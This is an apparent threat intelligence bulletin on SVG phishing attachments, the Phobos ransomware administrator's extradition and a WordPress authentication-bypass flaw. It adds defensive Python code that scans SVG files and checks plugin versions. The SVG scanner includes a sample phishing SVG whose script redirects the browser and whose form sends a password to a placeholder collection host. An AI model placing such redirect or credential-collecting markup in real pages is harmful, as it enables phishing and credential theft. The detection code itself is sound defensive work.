Ankura CTIX FLASH Update - November 19, 2024

Malware Activity

 

SVG Attachments Increasingly Popular in Phishing Attacks

Cybersecurity researchers have found that Scalable Vector Graphics (SVG) attachments are becoming an increasingly popular way for threat actors to deliver malware or serve phishing forms while evading detection. SVG files describe images as code (vector geometry) instead of pixels, which lets them resize to any resolution without losing quality. SVG files have been used before by threat actors, notably to distribute Qbot malware via HTML smuggling. In recent campaigns, researchers have observed SVG files that display HTML and execute JavaScript, crafted to render phishing forms that send victims' inputs back to the attacker. SVG attachments can also embed links that lead to a malware site when clicked, or use JavaScript to redirect the browser to a malicious site automatically. Because of this ability to carry active content, SVG files evade detection by security software more easily than other file types. Fortunately, SVG attachments are uncommon in business email, and organizations may choose to block all emails containing an SVG attachment by policy. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.
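For teams that cannot block SVG outright, the following added example (not part of the original update) shows a defender-side triage check that parses an SVG attachment and flags the active-content features described above: script elements, embedded HTML via foreignObject, event-handler attributes, and javascript: or external links. The two SVG samples are constructed fixtures, not real phishing files.

```python
import re
import xml.etree.ElementTree as ET

# Constructed fixture: an SVG carrying a script, an HTML form via foreignObject,
# an onload handler and a javascript: link. Domains are RFC 2606 reserved names.
SUSPICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">
  <script>window.location = "https://example.invalid/login";</script>
  <foreignObject width="300" height="200">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://example.invalid/collect">
      <input name="pw"/>
    </form>
  </foreignObject>
  <a xlink:href="javascript:void(0)"><text>Open</text></a>
</svg>"""

# Constructed fixture: a plain vector drawing with no active content.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>'

# Elements that execute code or embed HTML/other documents inside an image.
ACTIVE_TAGS = {"script", "foreignobject", "form", "iframe", "embed", "object"}
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)   # onload, onclick, ...
RISKY_HREF_PREFIXES = ("javascript:", "http://", "https://")

def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree adds to tags and attributes."""
    return name.rsplit("}", 1)[-1].lower()

def svg_findings(data: bytes) -> list:
    """Return a list of findings; an empty list means no active content was seen."""
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # Malformed files are flagged rather than silently passed.
        return [f"unparseable-xml: {exc}"]
    if _local(root.tag) != "svg":
        findings.append(f"root-not-svg:{_local(root.tag)}")
    for el in root.iter():
        name = _local(el.tag)
        if name in ACTIVE_TAGS:
            findings.append(f"element:{name}")
        for attr, value in el.attrib.items():
            a = _local(attr)
            if EVENT_ATTR.match(a):
                findings.append(f"event-handler:{a}")
            if a == "href" and value.strip().lower().startswith(RISKY_HREF_PREFIXES):
                findings.append(f"href:{value.strip()[:60]}")
    return findings

def is_suspicious(data: bytes) -> bool:
    return bool(svg_findings(data))
```

Running the checker over a mail gateway's quarantined SVG attachments gives a fast first-pass verdict; a clean result does not prove the file is safe, only that none of these markers are present.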

 

Threat Actor Activity

 

Alleged Administrator of Phobos Ransomware Service Extradited from South Korea to US

Evgenii Ptitsyn, a Russian national suspected of being an administrator of the Phobos ransomware operation, has been extradited from South Korea to face charges in the United States. Phobos, a ransomware-as-a-service (RaaS) model derived from the Crysis ransomware family, has been responsible for attacks on over one thousand (1,000) entities globally, resulting in over $16 million in ransom payments. The operation involved selling access to ransomware payloads on the dark web, with targets including schools, hospitals, and small businesses. Ptitsyn, allegedly using the online aliases "derxan" and "zimmermanx," is charged with wire fraud, conspiracy to commit computer fraud, and extortion related to hacking. Each ransomware deployment was uniquely identified, linking it to corresponding decryption keys and to payments directed to specific cryptocurrency wallets. From December 2021 to April 2024, decryption fees collected by affiliates were transferred to a wallet controlled by Ptitsyn. If convicted, he faces significant prison sentences: up to twenty (20) years for each wire fraud count, ten (10) years for each hacking count, and five (5) years for conspiracy charges. Phobos affiliates often used "spray and pray" tactics, aiming ransomware at numerous potential targets in the hope that some would be infected. Their ransom demands were relatively small, often under $2,000, increasing the likelihood of payment. Despite the lower technical proficiency of its affiliates compared to other ransomware groups, Phobos maintained a structured operation and closely monitored affiliate performance. Recent trends point to law enforcement prioritizing the dismantling of ransomware networks. The reduction in Phobos activity following Ptitsyn's arrest suggests a direct impact on the group's operations, signaling progress in curbing such cyber threats.

 

Vulnerabilities

 

WordPress Plugin Vulnerability Exposes Administrative Access in 2FA-Enabled Devices

A critical vulnerability identified in the WordPress plugin 'Really Simple Security' (formerly 'Really Simple SSL') has exposed over four million websites to potential full administrative takeover. The flaw, tracked as CVE-2024-10924 and rated with a critical CVSS score of 9.8, affects both the free and premium versions of the plugin. It stems from improper handling of user authentication in the plugin's two-factor REST API actions, particularly within the 'check_login_and_get_user()' function. This flaw allows unauthorized attackers to gain administrative access when two-factor authentication (2FA) is enabled, posing a significant risk to affected sites. Discovered by Wordfence on November 6, 2024, the vulnerability can be exploited using automated scripts, potentially leading to widespread attacks across numerous WordPress sites. The exploit involves bypassing authentication checks, which, when combined with the plugin's popularity, makes it an attractive target for large-scale automated attacks. The issue was quickly addressed with the release of version 9.1.2 of the plugin, which fixes the improper handling of 'login_nonce' verification. Wordfence, in coordination with the plugin's developers and WordPress[.]org, initiated a forced security update for all sites using the plugin. However, it's crucial for website administrators to verify that their sites have been updated to the latest patched version, especially since auto-updates may not function for users with expired licenses. As a precaution, CTIX analysts advise administrators to confirm their plugin version and update immediately to mitigate the risk of site compromise.
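Because the forced update may not reach sites with expired licenses, administrators should confirm the installed version themselves. The following added example (not part of the original update, and not the plugin's own code) reads the Version: field from a WordPress plugin main-file header and compares it numerically against the patched release 9.1.2 named above; the header excerpt is a constructed sample.

```python
import re
from typing import Optional

# Patched release named in the advisory; anything older is treated as vulnerable.
FIXED_VERSION = "9.1.2"

# Constructed excerpt of a WordPress plugin main-file header. Real plugin headers use
# this "Key: value" comment format; the version value here is invented for the example.
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: Really Simple Security
 * Version: 9.1.1
 * Requires at least: 5.9
 */
"""

def plugin_version(php_source: str) -> Optional[str]:
    """Return the Version: field from a WordPress plugin header, or None if absent."""
    m = re.search(r"^[\s*]*Version:\s*(\S+)", php_source, re.MULTILINE)
    return m.group(1) if m else None

def version_key(version: str) -> tuple:
    """Numeric components only, so '9.1.10' sorts after '9.1.2' (a string compare would not)."""
    return tuple(int(part) for part in re.findall(r"\d+", version))

def needs_update(php_source: str) -> bool:
    """True when the header is missing or its version is older than FIXED_VERSION.
    A missing header is reported as needing attention rather than silently passing."""
    found = plugin_version(php_source)
    if found is None:
        return True
    return version_key(found) < version_key(FIXED_VERSION)
```

Point the function at the plugin's main PHP file on each site (or at the output of the hosting panel's plugin listing) to confirm the update actually landed.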

 

The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence about current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high-level intelligence about recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to contact the CTIX Team (ctix@ankura.com) if you need more context.

© Copyright 2024. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
